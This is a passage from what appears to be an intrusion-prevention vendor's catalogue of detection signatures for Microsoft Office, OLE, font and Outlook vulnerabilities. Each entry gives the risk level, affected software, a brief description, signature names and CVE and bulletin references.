Microsoft-Office-Publisher-Invalid-Memory-Reference

About this vulnerability: A vulnerability in Microsoft Publisher
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher; Microsoft Office
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Office Publisher. The vulnerability is due to improper handling of user-supplied data without sufficient validation. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted PUB file, potentially causing memory corruption and arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Office-Publisher-Invalid-Memory-Reference
File-OLE_Microsoft-Office-Publisher-Invalid-Memory-Reference
References:
CVE-2008-0102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0102
BID-27739
http://www.securityfocus.com/bid/27739
MS08-012
http://technet.microsoft.com/security/bulletin/MS08-012
Back to top

Microsoft-Office-Remote-Code-Execution-CVE-2016-0012

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Malfunction
Description: A vulnerability in Microsoft Office
Situation: File-Text_Microsoft-Office-Remote-Code-Execution-CVE-2016-0012
References:
CVE-2016-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0012
MS16-004
http://technet.microsoft.com/security/bulletin/MS16-004
Back to top

Microsoft-Office-Remote-Code-Execution-CVE-2024-38021

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-1750-5242
Last changed: sgpkg-ips-1750-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Office.
Situation: File-Text_Microsoft-Office-Remote-Code-Execution-CVE-2024-38021
References:
CVE-2024-38021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38021
ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul
Back to top

Microsoft-Office-Remote-Code-Execution-CVE-2025-21365

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Office detected
Risk: High
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Platform: Windows
Software: Microsoft Office
Type: Input Validation
Description: Microsoft Office's remote code execution vulnerability CVE-2025-21365.
Situation: File-Zip_Microsoft-Office-Remote-Code-Execution-CVE-2025-21365
References:
CVE-2025-21365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21365
ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan
Back to top

Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2004; Microsoft Office 2008
Type: Input Validation
Description: There is a vulnerability in Microsoft Office.
Situation: HTTP_SS-Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333
File-RTF_Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333
References:
CVE-2010-3333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333
BID-44652
http://www.securityfocus.com/bid/44652
OSVDB-69085
http://www.osvdb.org/69085
MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087
Back to top

Microsoft-Office-Security-Feature-Bypass-CVE-2023-36413

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Office detected
Risk: High
First detected in: sgpkg-ips-1651-5242
Last changed: sgpkg-ips-1651-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: This detects Microsoft Office security feature bypasses, in which Microsoft Office fails to enforce Protected View on documents downloaded from the Internet, potentially allowing macros to be enabled or other dangerous activities.
Situation: File-Name_Microsoft-Office-Security-Feature-Bypass-CVE-2023-36413
References:
CVE-2023-36413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36413
ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov
Back to top

Microsoft-Office-SharePoint-Server-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Office SharePoint Server
Risk: High
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server; Microsoft SharePoint Foundation
Type: Cross-site Scripting
Description: There exists a cross-site scripting vulnerability in Microsoft SharePoint Enterprise Server 2016, and Microsoft SharePoint Foundation 2013 Service Pack 1, which allows a remote attacker to execute arbitrary JavaScript code by sending a maliciously crafted request.
Situation: HTTP_CRL-Microsoft-Office-SharePoint-Server-Cross-Site-Scripting
References:
CVE-2019-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1070
Back to top

Microsoft-Office-Sharepoint-Server-help.aspx-Cross-Site-Scripting

About this vulnerability: A cross-site scripting vulnerability in Microsoft Office SharePoint Server
Risk: Moderate
First detected in: sgpkg-ips-303-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in Microsoft Office SharePoint Server. A remote attacker can exploit this vulnerability by embedding malicious HTML or script code as a part of a URL, to be executed in the target user's browser with the privileges of the website.
Situation: HTTP_CRL-Microsoft-Office-Sharepoint-Server-help.aspx-Cross-Site-Scripting
References:
CVE-2010-0817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0817
BID-39776
http://www.securityfocus.com/bid/39776
MS10-039
http://technet.microsoft.com/security/bulletin/MS10-039
Back to top

Microsoft-Office-Spoofing-Vulnerability-CVE-2024-38200

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A vulnerability in Microsoft Office allows a remote attacker to capture NTLM hashes from the target.
Situation: File-Text_Microsoft-Office-URI-Scheme-Link-In-HTML
References:
CVE-2024-38200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38200
ms24-aug
http://technet.microsoft.com/security/bulletin/ms24-aug
Back to top

Microsoft-Office-Spoofing-Vulnerability-CVE-2024-43609

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A vulnerability in Microsoft Office allows a remote attacker to capture NTLM hashes from the target.
Situation: File-Text_Microsoft-Office-Spoofing-Vulnerability-CVE-2024-43609
References:
CVE-2024-43609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43609
ms24-oct
http://technet.microsoft.com/security/bulletin/ms24-oct
Back to top

Microsoft-Office-Suspicious-Ddeauto-Command

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A file that contains a suspicious DDEAUTO command was detected. Dynamic Data Exchangce (DDE) is one of Microsoft Office's methods of transferring data between applications, but it has also been exploited to include malicious content.
Situation: File-OLE_Microsoft-Office-Suspicious-Ddeauto-Command
File-RTF_Microsoft-Office-Suspicious-Ddeauto-Command
Back to top

Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution

About this vulnerability: Integer underflow vulnerability in Microsoft Office Text Convertor
Risk: High
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There is an integer underflow vulnerability in Microsoft Office Text Convertor. Remote attackers can exploit this vulnerability by enticing a target user to open a malicious Word 6 file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: E-Mail_BS-Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
HTTP_SS-Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
File-OLE_Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
References:
CVE-2009-0087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0087
OSVDB-53662
http://www.osvdb.org/53662
MS09-010
http://technet.microsoft.com/security/bulletin/MS09-010
Back to top

Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-363-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010
Type: Malfunction
Description: There is a vulnerability in Microsoft Office.
Situation: HTTP_SS-Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947
File-Binary_Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947
References:
CVE-2010-3947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3947
MS10-105
http://technet.microsoft.com/security/bulletin/MS10-105
Back to top

Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Windows Media Player which could allow remote code execution.
Situation: File-OLE_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
File-RTF_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
File-TextId_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
References:
CVE-2015-1770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1770
MS15-059
http://technet.microsoft.com/security/bulletin/MS15-059
Back to top

Microsoft-Office-Visio-Data-Type-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Visio
Risk: Moderate
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Visio
Type: Buffer Overflow
Description: A code execution vulnerability exists in Microsoft Visio. The vulnerability is due to insufficient validation when processing certain attributes in Visio files. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to download and open a malicious file with an affected version of Visio. In attack scenarios where code execution is successful the behaviour of the target machine is dependent entirely on the intention of the injected code, which will run within the security context of the target user. When code execution is not successful the affected application may terminate abnormally leading to a denial of service condition.
Situation: File-OLE_Microsoft-Office-Visio-Data-Type-Memory-Corruption
References:
CVE-2011-0093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0093
BID-46138
http://www.securityfocus.com/bid/46138
OSVDB-70829
http://www.osvdb.org/70829
MS11-008
http://technet.microsoft.com/security/bulletin/MS11-008
Back to top

Microsoft-Office-Web-Components-2-MS09-043

About this vulnerability: Remote code execution vulnerability in Microsoft OWC
Risk: Moderate
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office Web Components
Type: Malfunction
Description: There is a remote code execution vulnerability in Microsoft Office Web Components (OWC).
Situation: HTTP_SS-Microsoft-Office-Web-Components-2-MS09-043
File-Text_Microsoft-Office-Web-Components-2-MS09-043
References:
CVE-2009-1534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1534
BID-35992
http://www.securityfocus.com/bid/35992
OSVDB-56916
http://www.osvdb.org/56916
MS09-043
http://technet.microsoft.com/security/bulletin/MS09-043
Back to top

Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136

About this vulnerability: A vulnerability in Microsoft Web Components
Risk: High
First detected in: sgpkg-ips-230-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2003; Microsoft Office Web Components
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Office Web Components.
Situation: HTTP_SS-Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
HTTP_SS-Microsoft-Office-Web-Components-Code-Execution-Exploit-MS09-043
File-Text_Microsoft-Office-Web-Components-Code-Execution-Exploit-MS09-043
File-Text_Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
References:
CVE-2009-1136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1136
MS09-043
http://technet.microsoft.com/security/bulletin/MS09-043
Back to top

Microsoft-Office-Web-Components-MS09-043

About this vulnerability: Remote code execution vulnerability in Microsoft OWC
Risk: Moderate
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office Web Components
Type: Malfunction
Description: There is a remote code execution vulnerability in Microsoft Office Web Components (OWC).
Situation: HTTP_SS-Microsoft-Office-Web-Components-MS09-043
File-Text_Microsoft-Office-Web-Components-MS09-043
References:
CVE-2009-0562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0562
BID-35990
http://www.securityfocus.com/bid/35990
MS09-043
http://technet.microsoft.com/security/bulletin/MS09-043
Back to top

Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office; Microsoft BizTalk Server; Microsoft Commerce Server; Microsoft Internet Security and Acceleration Server; Microsoft Visual Studio .NET
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Microsoft Office Web Components. The vulnerability is due to improper handling of certain URLs. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation would result in code execution in security context of the logged-in user.
Situation: HTTP_SS-Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow
File-Text_Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow
References:
CVE-2006-4695
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4695
BID-28135
http://www.securityfocus.com/bid/28135
MS08-017
http://technet.microsoft.com/security/bulletin/MS08-017
Back to top

Microsoft-Office-Word-And-Web-Apps-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Microsoft Office Web Apps Server
Risk: Moderate
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office Word and Web Apps. The vulnerability is due to insufficient validation of input while processing specially crafted Office files. A remote attacker can exploit this vulnerability by enticing the user to open a specially crafted Word file using the vulnerable software. This can result in arbitrary code execution on the affected machine in the context of the user privilege.
Situation: File-TextId_Microsoft-Office-Word-And-Web-Apps-Memory-Corruption
References:
CVE-2014-4117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4117
BID-70360
http://www.securityfocus.com/bid/70360
OSVDB-113190
http://www.osvdb.org/113190
MS14-061
http://technet.microsoft.com/security/bulletin/MS14-061
Back to top

Microsoft-Office-Word-CVE-2014-6333-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office 2007
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office. The vulnerability is due to improper handling of embedded font objects when parsing a specially crafted Office document. Remote, unauthenticated attackers could exploit this vulnerability by enticing a target user to open a specially crafted Office file. Successful exploitation allows the attacker to execute arbitrary code in the context of the current user.
Situation: File-OLE_Microsoft-Office-Word-CVE-2014-6333-Use-After-Free
References:
CVE-2014-6333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6333
OSVDB-114528
http://www.osvdb.org/114528
MS14-069
http://technet.microsoft.com/security/bulletin/MS14-069
Back to top

Microsoft-Office-Word-CVE-2019-0540-Security-Feature-Bypass

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: An information disclosure vulnerability has been reported in the Word component of Microsoft Office. This vulnerability is due to improper handling of fields. A remote attacker could Improper handling of fields in a Word file causes an information disclosure vulnerability in Microsoft Office.
Situation: File-OLE_Microsoft-Office-Word-CVE-2019-0540-Security-Feature-Bypass
References:
CVE-2019-0540
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0540
Back to top

Microsoft-Office-Word-CVE-2019-0561-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A vulnerability in MS Word.
Situation: File-OLE_Microsoft-Office-Word-CVE-2019-0561-Information-Disclosure
References:
CVE-2019-0561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0561
Back to top

Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Word
Risk: Moderate
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in Microsoft Office Word. The flaw is due to the way the affected product processes specially crafted Word files. A remote attacker can exploit this vulnerability by enticing a target user to open a Word file with a malicious record. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. The behaviour of the target host is entirely dependent on the intended function of the injected code. An unsuccessful exploit attempt may terminate the affected application abnormally.
Situation: HTTP_SS-Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption
File-OLE_Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption
References:
CVE-2009-3135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3135
BID-36950
http://www.securityfocus.com/bid/36950
OSVDB-59857
http://www.osvdb.org/59857
MS09-068
http://technet.microsoft.com/security/bulletin/MS09-068
Back to top

Microsoft-Office-Word-HTML-Linked-Objects-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Word
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Office Word. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-OLE_Microsoft-Office-Word-HTML-Linked-Objects-Memory-Corruption
References:
CVE-2010-1903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1903
BID-42130
http://www.securityfocus.com/bid/42130
MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056
Back to top

Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office Compatibility Pack
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office Compatibility Pack; Microsoft Office 2004; Microsoft Office 2008; Microsoft Word; Microsoft Open XML File Format Converter; Microsoft Works
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Microsoft Office Word. The vulnerability is due to a boundary error when handling a malformed sprmCMajority record within Microsoft Office documents. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target system by enticing a user to open a maliciously crafted file. In situations where code execution is successful the injected code will run within the security context of the currently logged in user. If code execution fails, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow
File-OLE_Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow
References:
CVE-2010-1900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1900
BID-42136
http://www.securityfocus.com/bid/42136
MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056
Back to top

Microsoft-Office-Word-Sprmtdiagline80-Record-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office for Mac
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office 2004; Microsoft Office 2008
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Microsoft Office Word. The vulnerability is due to a boundary error while parsing a crafted word document. This vulnerability may be exploited by enticing a user to open a maliciously crafted file. In situations where code execution is successful the injected code will run within the security context of the currently logged in user. If code execution fails, the vulnerable application may terminate abnormally.
Situation: File-OLE_Microsoft-Office-Word-Sprmtdiagline80-Record-Parsing-Stack-Buffer-Overflow
References:
CVE-2010-3214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3214
BID-43760
http://www.securityfocus.com/bid/43760
MS10-079
http://technet.microsoft.com/security/bulletin/MS10-079
Back to top

Microsoft-Office-Word-Stsh-Record-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Word
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Office Word. The vulnerability is due to a memory corruption when parsing a specially crafted Word file. An attacker could exploit this vulnerability to execute arbitrary code in the context of the current user by enticing them to open a specially crafted Word document. Unsuccessful code execution attempts may crash the vulnerable application resulting in denial-of-service condition.
Situation: File-OLE_Microsoft-Office-Word-Stsh-Record-Parsing-Memory-Corruption
Back to top

Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office Converter Pack
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office Converter Pack; Microsoft Word
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in the Microsoft Office WordPerfect 6.x converter. The flaw is due to a boundary error when processing a crafted WordPerfect document file. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted WordPerfect document with the affected software. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. In the case of an unsuccessful code execution attack, the affected product will terminate resulting in loss of any unsaved data from the current session. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow
File-Binary_Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow
References:
CVE-2009-0088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0088
BID-34469
http://www.securityfocus.com/bid/34469
OSVDB-53663
http://www.osvdb.org/53663
MS09-010
http://technet.microsoft.com/security/bulletin/MS09-010
Back to top

Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658

About this vulnerability: An attempt to exploit vulnerability in Microsoft Windows detected
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in OLE Automation allows an attacker to execute code when parsing WMF files.
Situation: HTTP_SS-Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
SMB-TCP_FR-Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
File-Binary_Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
References:
CVE-2011-0658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0658
MS11-038
http://technet.microsoft.com/security/bulletin/MS11-038
Back to top

Microsoft-OLE-Property-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Risk: Moderate
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Windows detected
Situation: File-OLE_Microsoft-OLE-Property-Vulnerability
References:
CVE-2011-3400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3400
MS11-093
http://technet.microsoft.com/security/bulletin/MS11-093
Back to top

Microsoft-OLE-Structured-Storage-File-Transfer

About this vulnerability: Transfer of an OLE Structured Strorage file
Risk: Low
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Any Software
Type: Insecure Configuration
Description: Object Linking and Embedding (OLE) is a technology developed by Microsoft for cross-application object referencing. OLE contains a method to store arbitrary data in file storage using a OLE Structured Storage file format. This file format is used by various applications, including Microsoft's Office family, for storage media.
Situation: E-Mail_BS-Microsoft-OLE-Structured-Storage-File-Transfer
E-Mail_BS-Microsoft-OLE-Structured-Storage-Suspicious-File-Transfer
HTTP_SS-Microsoft-OLE-Structured-Storage-File-Download
HTTP_SS-Microsoft-OLE-Structured-Storage-Suspicious-File-Download
HTTP_SS-Microsoft-OLE-Structured-Storage-Excessive-SAT-Size
File-OLE_Microsoft-Structured-Storage-File
File-OLE_Microsoft-Structured-Storage-Suspicious-File
File-OLE_Microsoft-Structured-Storage-Excessive-SAT-Size
File-OLE_Unusual-Directory-Structure
Back to top

Microsoft-OLE-UtOlePresStmToContentsStm-Use-After-Free-CVE-2025-21298

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1858-5242
Last changed: sgpkg-ips-1858-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A use-after-free vulnerability has been reported in Microsoft OLE. The vulnerability is due to improper memory management when handling OLE objects. A remote attacker could exploit this vulnerability by enticing the victim to open a crafted RTF or MSG file, or by sending a crafted email to the victim. Successful exploitation could result in denial-of-service conditions or, in the worst case, arbitrary code execution in the security context of the service.
Situation: File-RTF_Microsoft-OLE-UtOlePresStmToContentsStm-Use-After-Free-CVE-2025-21298
References:
CVE-2025-21298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21298
Back to top

Microsoft-OMI-Management-Interface-Authentication-Bypass

About this vulnerability: A vulnerability in Microsoft Azure OMI.
Risk: High
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Linux; Unix
Software: Microsoft Azure Open Management Infrastructure
Type: Malfunction
Description: A vulnerability in Microsoft Azure OMI, versions before 1.6.8-1, which allows remote attackers to execute operating system commands as root by sending an HTTP request without the Authorization header.
Situation: HTTP_CS-Microsoft-OMI-Management-Interface-Authentication-Bypass
References:
CVE-2021-38647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38647
Back to top

Microsoft-OpenType-Font-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A code execution vulnerability has been reported in Microsoft OpenType. The vulnerability is due to the way specially crafted OpenType fonts are parsed by the OpenType font driver which can lead to a double free memory error. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with kernel permissions.
Situation: File-Binary_Microsoft-OpenType-Font-Handling-Memory-Corruption
References:
CVE-2010-3957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3957
BID-45315
http://www.securityfocus.com/bid/45315
MS10-091
http://technet.microsoft.com/security/bulletin/MS10-091
Back to top

Microsoft-OpenType-Font-Index-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Windows OpenType format driver. The vulnerability is due to the way specially crafted OpenType fonts are parsed by the OpenType font driver. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected font engine, such as Windows Font Viewer, or various web browsers. Successful exploitation of this vulnerability would result in arbitrary code execution within the kernel. In the case of an unsuccessful code injection attack, the affected system will crash with a BSoD, causing a denial of service condition.
Situation: File-Binary_Microsoft-OpenType-Font-Index-Remote-Code-Execution
References:
CVE-2010-3956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3956
BID-45311
http://www.securityfocus.com/bid/45311
MS10-091
http://technet.microsoft.com/security/bulletin/MS10-091
Back to top

Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1605-5242
Platform: Windows
Software: Microsoft Outlook
Type: Malfunction
Description: An elevation of privilege vulnerability has been reported in Microsoft Outlook. Successful exploitation can allow remote attackers to capture NTLM hashes via malicious emails.
Situation: File-Binary_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
File-Binary_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397-2
File-OLE_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
References:
CVE-2023-23397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23397
ms23-mar
http://technet.microsoft.com/security/bulletin/ms23-mar
Back to top

Microsoft-Outlook-Express-And-Windows-Mail-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Outlook Express and Windows Mail
Risk: High
First detected in: sgpkg-ips-304-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook Express
Type: Input Validation
Description: There is a vulnerability in Microsoft Outlook Express and Windows Mail.
Situation: POP3_SS-Microsoft-Outlook-Express-And-Windows-Mail-Integer-Overflow
References:
CVE-2010-0816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0816
BID-40052
http://www.securityfocus.com/bid/40052
MS10-031
http://technet.microsoft.com/security/bulletin/MS10-031
Back to top

Microsoft-Outlook-Express-And-Windows-Mail-MHTML-URL-Parsing-Vulnerability

About this vulnerability: A vulnerability in Outlook Express and Windows Mail
Risk: High
